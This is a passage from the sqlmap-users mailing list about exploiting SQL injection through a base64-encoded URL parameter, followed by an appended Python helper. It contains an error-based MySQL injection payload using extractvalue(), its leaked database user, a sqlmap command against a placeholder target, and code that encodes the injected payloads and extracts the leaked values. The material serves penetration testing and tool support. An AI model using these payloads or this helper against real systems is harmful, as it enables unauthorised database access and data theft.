Miroslav,

I previously exploited this manually. The injection occurs in the MySQL
INSERT statement. If the statement is invalid, we get an error message in
HTML comments like so:

<!--You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''lalalaa)))
or'')' at line 1-->

which is then exploitable using some well-documented methods, such as
appending a string like this:
' or extractvalue(1,concat(0x7e,(SELECT user()))) or'

which gives us a nice error:
<!--XPATH syntax error: '~root@localhost'-->


Anyhow, I got halfway there with the following string:

sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080

sqlmap sends correctly encoded test vectors, but it doesn't send the
correct initial URL stability check vector:

1st request URL:
https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
2nd request URL:
https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D

Also none of the test vectors seem to trigger an error response.

I tried with --risk=3 to no avail.

version: 1.0-dev-1ef2c40

--
Konrads Smelkovs
Applied IT sorcery.

On 30 October 2014 13:12, Miroslav Stampar <miroslav.stam...@gmail.com>
wrote:

> Hi.
>
> In your case I would do this:
>
> 1) Decode original base64 value and give it to the sqlmap in decoded form
> (e.g. id=123 instead of original id=313233)
> 2) Use --tamper=base64encode
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <konr...@smelkovs.com>
> wrote:
>
>> Hello,
>>
>> I am writing a small modification that would allow tampering with or
>> decoding variables in the request.
>> As I understand it, the parameters are decoded/parsed into a dict
>> after option.py:2323 (parseTargetDirect()), but where can I access the
>> full, parsed dict of the GET/POST/cookie values?
>>
>> (specifically I have a base64 encoded string as a parameter and to
>> insert the payload, the parameter must be base64-decoded, injected and
>> then encoded back)
>>
>>
>> --
>> Konrads Smelkovs
>> Applied IT sorcery.
>>
>>
>> ------------------------------------------------------------------------------
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
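Added example, not code from the thread or from sqlmap itself: a standalone Python sketch of the three moving parts discussed in this thread. It has a tamper() with the same shape as a sqlmap tamper script that base64-encodes the outgoing value, the decode / inject / re-encode round trip for a base64 parameter that the original question asks about, and a small parser that pulls the leaked value out of the <!--XPATH syntax error: ...--> comment. The URL, parameter name, extractvalue() payload and the second request URL are the ones quoted above; the function names, the sample response body and the helper that shows what was appended to the value are this example's own assumptions.

```python
import base64
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed sample data, copied from the thread: the `data` parameter in its
# decoded form (the form handed to sqlmap) and the error-based payload.
DECODED_DATA = "DATA:User=Test,CC=4512634722348842,CVV=1337"
TARGET_URL = "https://target/script.php?data=" + DECODED_DATA
EXTRACTVALUE_PAYLOAD = "' or extractvalue(1,concat(0x7e,(SELECT user()))) or'"

# The second request URL quoted in the thread, used below to show what sqlmap
# appended to the value before the tamper base64-encoded it.
OBSERVED_SECOND_URL = (
    "https://target/script.php?"
    "data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D"
)


def tamper(payload, **kwargs):
    """Same shape as a sqlmap tamper() function: take the string that is about
    to be sent for the parameter and return it base64-encoded. Standalone copy
    for this example; it does not import sqlmap's own modules."""
    if not payload:
        return payload
    return base64.b64encode(payload.encode("utf-8")).decode("ascii")


ENCODED_DATA = tamper(DECODED_DATA)  # what the application expects on the wire


def inject_into_base64_param(url, name, payload, encoded=True):
    """Return `url` with parameter `name` rewritten as base64(plain + payload).

    With encoded=True the parameter currently holds base64 (the application's
    real format); with encoded=False it is already decoded (what the thread
    passes to sqlmap). Either way the outgoing value is re-encoded, which is
    the decode / inject / re-encode round trip the original question asks for.
    """
    parts = urlsplit(url)
    rewritten = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == name:
            plain = base64.b64decode(value).decode("utf-8") if encoded else value
            value = tamper(plain + payload)
        rewritten.append((key, value))
    # urlencode percent-encodes '=', '+' and '/', so the base64 survives the query string
    return urlunsplit(parts._replace(query=urlencode(rewritten)))


def decode_sent_value(url, name):
    """What the server sees after base64-decoding parameter `name` of `url`."""
    query = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return base64.b64decode(query[name]).decode("utf-8")


def appended_by_sqlmap(url, name, original=DECODED_DATA):
    """Whatever sqlmap tacked onto the original value before the tamper ran."""
    sent = decode_sent_value(url, name)
    if not sent.startswith(original):
        raise ValueError("sent value does not start with the original value")
    return sent[len(original):]


# The error the thread shows, leaked inside an HTML comment; 0x7e ('~') in the
# payload marks where the XPath noise ends and the query result begins.
XPATH_ERROR = re.compile(r"<!--XPATH syntax error: '~(?P<value>[^']*)'-->")


def extract_error_value(html):
    """Return the value leaked through the extractvalue() error, or None."""
    m = XPATH_ERROR.search(html)
    return m.group("value") if m else None


# Constructed response body, shaped like the one quoted in the thread.
SAMPLE_RESPONSE = (
    "<html><body>thanks</body>"
    "<!--XPATH syntax error: '~root@localhost'--></html>"
)


if __name__ == "__main__":
    sent = inject_into_base64_param(TARGET_URL, "data", EXTRACTVALUE_PAYLOAD, encoded=False)
    print("request URL:", sent)
    print("server-side value:", decode_sent_value(sent, "data"))
    print("appended by sqlmap in the observed request:", repr(appended_by_sqlmap(OBSERVED_SECOND_URL, "data")))
    print("leaked:", extract_error_value(SAMPLE_RESPONSE))
```

Decoding the second request URL from the thread shows the original value followed by the characters sqlmap added for its check, all encoded together, which is why the decoded form has to be given to sqlmap and the tamper applied on the way out; the first (stability) request in the thread went out still decoded, so it is worth checking in the proxy that every request the server sees decodes to the expected value.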